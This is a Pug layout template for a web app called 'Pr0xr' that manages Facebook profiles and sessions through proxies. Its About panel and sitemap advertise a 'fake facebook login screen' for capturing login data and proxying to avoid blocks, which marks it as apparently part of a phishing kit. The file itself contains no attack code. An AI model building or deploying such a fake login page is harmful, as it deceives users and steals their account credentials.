doctype html
html
	head
		title= title
		link(rel='stylesheet', href='https://maxcdn.bootstrapcdn.com/bootswatch/4.0.0/cosmo/bootstrap.min.css')
		link(rel='stylesheet', href='/stylesheets/style.css')
		link(rel="stylesheet", href="https://fonts.googleapis.com/icon?family=Material+Icons")
	body
		header
			//- if user
			#navbarHeader.collapse.bg-dark

				.container
					.row
						.col-sm-8.col-md-7.py-4
							h4.text-white About
							p.text-muted
								| Manage facebook profiles and session with ease, everything behind a proxy so you'll never gets blocked, you can add your accounts bellow or user our
								| 
								a(href="/") fake facebook login screen
								|  to capture your own data.
						.col-sm-4.offset-md-1.py-4
							h4.text-white Sitemap
							ul.list-unstyled
								li
									a.text-white(href='/users') Users
								li
									a.text-white(href='/config') Settings
								li
									a.text-white(href='/proxys') Proxy list
								li
									a.text-white(href='/') Fake screen				
								li
									a.text-white(href='/logout') Logout
			.navbar.navbar-dark.bg-dark.box-shadow.navv
				.container.d-flex.justify-content-between
					a.navbar-brand.d-flex.align-items-center(href='/users')
						img(src="/images/logo.svg")
						strong Pr0xr

					button.navbar-toggler(type='button', data-toggle='collapse', data-target='#navbarHeader', aria-controls='navbarHeader', aria-expanded='false', aria-label='Toggle navigation')
						span.navbar-toggler-icon
					


		block content
		script(src="https://code.jquery.com/jquery-3.1.0.min.js")
		script(src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.0.0/popper.es5.js")
		script(src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js")
		script(src="/javascripts/App.js")
